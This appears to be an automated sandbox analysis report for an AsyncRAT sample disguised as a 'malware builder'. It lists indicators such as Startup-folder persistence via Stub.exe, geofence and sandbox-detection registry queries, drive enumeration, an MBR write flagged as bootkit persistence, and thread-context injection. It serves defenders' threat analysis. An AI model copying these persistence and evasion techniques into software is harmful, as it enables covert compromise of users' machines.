asyncrat | c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 47 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	Stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	H-Malware Builder V5.exe

Drops startup file 45 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe

Executes dropped EXE 1 IoCs

pid	Process
3360	Stub.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3360 set thread context of 4688	3360	Stub.exe	90

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 63 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000acabe8a42aca9c46b5ea29c0326f10e20000000002000000000010660000000100002000000085c64a5b92c8b7fffbe06a9833f3c4c8961bb4411c9424250b9d3011c12b18ed000000000e80000000020000200000008d467b41a298e4a82bde347a6ba5678b70e33539daa86aaedb78cfe3057ce120b0030000176e310189e1cf37f6f906b71ae7f534b5c9b934cf76fd8e9f8f989d6ee7538cdb703beda8adfe0d9bb4cae6edec764daf2557a446bd24443072bf2e7ee191e22c7921a0beb090f36efd82e32098f6c78b742719738a0739ee44bb2166234882e071bee540815faddb0fe10714050ee6b9e467d8ca47cc09f45a1a615f4e52ca54da9e3b22b49fb5c279f5499fae4c1f6d6f6c44eb3309aa92d790270b8452c7a8333c6cd4cd0bcd8d59d4ab662ac81ddbd7f73d4928d3139f9b23dbdc3b353a4193680350189867a284b5f225365f2a6f1821fc911c5e2af25c63c47b14f0f7d4d016b7d79a0edd26abaff6f53490c599a37a028cc70c31142d4b0b30f13a1b3b1b763d1b9e48b91e62165c5d82efcc32c1a245461cb3f2a255a141d6741a7b1c66d8c08f3fc72d778daa50fffb97750cddf96b0286ea02c0711ab8423eb1334431ae0f292d385f6c028434a8203bee23126f61f80ea0a91ffa51a8f7fc009e396ad2c7b40304a83959dee895b2695707496fa081274f3eec6efb6d4818aa3259f61f7d355c703b875c192ff44e5a92632b178828bd89a3ba49fea118abb4dcc083bb38c951de252f7306e5426affeaaf0c5f321de2534976e5a8b84e81005dd3a4ed52ddbcbd1892fb3bae59fd6ecd0fa91668cb414ef4a177a8bf1967a54790b92484ab1f5ce36ed0eae3e02d8011e33fc953c887911c2425117bf3489e66e00b93f7a8d60431a190cd0853a8b43761c7fed6bf0cb1e90a609cd3f303c1273c47fa2d3457972765dd6e9cc7c2f9a4067fbc3cb893561cc71df2786bea3f6e636288fb95f2fb735bcb45e6f98f8255a365b65f822bc40750e1945bc47e56a185965e8fdf2e18904d5bd662835ed7908f8467bdaf8e0da6287cda67ca79129fe5d740ee779492c6586e744242ec7cb61b900d554767cfbef77c302ea1ee59c00f8e190401e71efccc676d91b69b06ef09eb926e817605a87d0105757cc592cf1afd4b66b78252e887be2e8457f86017b57ec0b684282598783d66ff56549c909492d8ae7726a3ae0690d11417c480099e74f91acb4cbad1e0a6145763c5401657c1913acf4a7357e3c9e2af780d6730bcfad3abd09a76f38c86983863d783d8e732ba7f64ded8e383cfa49dad5e0d3342857c6d0e7b0d97a178a815ef8ecd29211bfa1e279cf915c7fafa202d02b130ce4be7f11c76d80068ecc625bea0fb20f1d12cba25ab50efaee170c2f2079612cab2d7f38bbad23d01e53642480262a228c08df72b58f4356fa8b8b47520858a3240eb49953b9bdfe617d07e285239e10c2a06155e305e1aa2eb23a352a4074840000000cf0b87b871138cdd527fa542aee742a5b54a2232b5cac3d6f3f3a86d41bfa099bb91ea6fe3184ebd343a52e68a71c83d82b81888a9fa9a7b862e88a0505c8331	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188010E59E96B6"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00188010E59E96B6"	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733219301"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188010E59E96B6 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000acabe8a42aca9c46b5ea29c0326f10e200000000020000000000106600000001000020000000389669b16128d8f2550c774928cf9beb1479ab9d07daa76a4a492e18e9b60c8c000000000e8000000002000020000000a4b2895e6db6dfb50b8b2fac86f7936c49c89b18c89d72189b64af08042565268000000063aad3e40e5bd1ed23fbaab0cc8f737c23837b7f75d35fa32856eba1261d5b08c3594c195b105b65348cea46607d5c7a3a0e14e14266f32cbe4f041e3cc5e4045a63bee71246e1dc2becb84d86ca4d7d9b0f6a2f101cc8471b6c9456ffa366bca10db75ee18982b383e7bda572edd0efe049653936e57ca70184c47d94b777ae40000000f10ddcdf86fe5f95187e6e4a70ea037db52f65efabd2487827854a1c58805c9f3cd6d359c9c931ef319985cb10de7f4dfeb0df6646e4b7e25a3dc2765ffa197f	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 03 Dec 2024 09:48:22 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting	svchost.exe
